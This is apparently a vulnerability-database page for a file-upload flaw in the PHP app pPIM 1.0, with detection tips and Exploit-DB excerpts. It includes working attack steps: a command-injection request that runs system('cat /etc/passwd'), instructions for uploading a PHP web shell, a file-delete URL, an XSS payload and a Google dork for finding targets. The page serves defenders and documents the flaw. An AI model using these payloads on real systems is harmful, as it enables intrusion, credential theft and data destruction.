CVE-2008-4428
published 2008-10-03CVE-2008-4428: Unrestricted file upload vulnerability in upload.php in Phlatline's Personal Information Manager (pPIM) 1.0 and earlier allows remote attackers to execute…
PriorityP262critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
7.03%
93.4th percentile
Unrestricted file upload vulnerability in upload.php in Phlatline's Personal Information Manager (pPIM) 1.0 and earlier allows remote attackers to execute arbitrary code by uploading a .php file, then accessing it via a direct request to the file in the top-level directory.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| phlatline | personal_information_manager | <= 1.0 | — |
Detection & IOCsextracted from sources · hover to see the quote
commandlinkname=evil_link&linkurl=";$url=system('cat /etc/passwd');$foo="&linkdescription=test2&groupname=test+group&linksubmit=Make+Link↗
- →Detect unauthenticated file upload attempts to upload.php — look for multipart POST requests to /ppim/upload.php (with or without ?login=1) containing .php file uploads. ↗
- →Authentication bypass via GET parameter: monitor for requests appending '?login=1' to any pPIM PHP script (e.g., calendar.php?login=1, upload.php?login=1). ↗
- →Detect arbitrary file deletion attempts via upload.php using the 'mode=delfile' GET parameter. ↗
- →Monitor for direct GET requests to /ppim/password.dat, /ppim/Readme.txt, and /ppim/email/*.email — these expose credentials and version info without authentication. ↗
- →Use the Google dork 'inurl:events.php?listallevents' to identify exposed pPIM installations. ↗
- →Detect XSS probes in events.php via the 'date' GET parameter — look for script/alert payloads in events.php?mode=new&date=. ↗
- →Monitor for unauthenticated POST requests to /ppim/sendmail.php with 'submitemail' form field — indicates abuse of the open email relay. ↗
- →After a successful upload, attackers access the dropped PHP webshell directly from the top-level pPIM directory (e.g., /ppim/shell.php or /ppim/phpinfo.php). ↗
- ·The authentication bypass (?login=1) only works if the web server is NOT configured to execute PHP embedded in HTML files; if PHP-in-HTML execution is enabled, the header.html auth check fires normally. ↗
- ·Uploaded files land in the top-level pPIM directory, not a sandboxed upload folder, making them directly web-accessible and executable. ↗
- ·Command injection via the link URL field relies on PHP include() of attacker-controlled flat files; the injected system() call runs with web server process privileges. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
pPIM 1.0 - Multiple Vulnerabilities
exploitdb·2009-02-25
CVE-2008-4528 pPIM 1.0 - Multiple Vulnerabilities
pPIM 1.0 - Multiple Vulnerabilities
---
- -= pPIM Multiple Vulnerabilities =-
Version Tested: pPIM 1.0
Vendor notified
Full details can also be found at http://www.lampsecurity.org/node/18
Author: Justin C. Klein Keane
Description
pPIM (http://www.phlatline.org/index.php?page=prod-ppim) is a Personal
Information Management application written in PHP that can store
contacts (including their photos), events, links, notes, send and check
email, and upload files. pPIM came to my attention recently with the
publishing on Milw0rm of exploit code designed to facilitate remote
command execution (http://www.milw0rm.com/exploits/8093). As there is a
milw0rm exploit already posted it is likely malicious users are already
exploiting pPIM. I decided to have a closer look at pPIM and, quite
frankly
Exploit-DB
pPIM 1.0 - Upload/Change Password
exploitdb·2008-08-11
CVE-2008-4528 pPIM 1.0 - Upload/Change Password
pPIM 1.0 - Upload/Change Password
---
Ppim <= 1.0 (upload/change password) Multiple Vulnerabilities
cript : Ppim v1.0
Download : http://scripts.ringsworld.com/organizers/ppim.zip
By Stack
Poc 1: change password
for change password go to this link
http://localhost/ppim/changepassword.php
writhe your password and confirm it
Poc 2 : upload
http://localhost/ppim/upload.php
you can upload you php shell in this link
after you go here
http://localhost/ppim/shell.php
# milw0rm.com [2008-08-11]
Exploit-DB
pPIM 1.0 - Arbitrary File Delete / Cross-Site Scripting
exploitdb·2008-08-10
CVE-2008-4528 pPIM 1.0 - Arbitrary File Delete / Cross-Site Scripting
pPIM 1.0 - Arbitrary File Delete / Cross-Site Scripting
---
##########################################################
#Author : BeyazKurt
#Contact : [email protected]
#
#Script : Ppim v1.0 [Bu ne bicim script adidir amk :D ]
#Download : http://scripts.ringsworld.com/organizers/ppim.zip
#
# D0rk : inurl:events.php?listallevents
#
# File Delete Vulnerability: upload.php
#
# Example:http://creawebs.com.mx/sistema/upload.php?mode=delfile&file=Creando Wiki.pptx
# Exploit:http://SITE.COM/upload.php?mode=delfile&file=FileName
#
# $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
#
# XSS Vulnerability: events.php
#
#[CODE]
# New Event";
# }
# ?>
#[/CODE]
#
#Exploit :
# events.php?mode=new&date=XSS CODE
# events.php?mode=new&date=">alert('XSS')
# -------------------------------
#
#
http://secunia.com/advisories/31424http://securityreason.com/securityalert/4349http://www.securityfocus.com/bid/30627https://exchange.xforce.ibmcloud.com/vulnerabilities/44390https://www.exploit-db.com/exploits/6231http://secunia.com/advisories/31424http://securityreason.com/securityalert/4349http://www.securityfocus.com/bid/30627https://exchange.xforce.ibmcloud.com/vulnerabilities/44390https://www.exploit-db.com/exploits/6231
2008-10-03
Published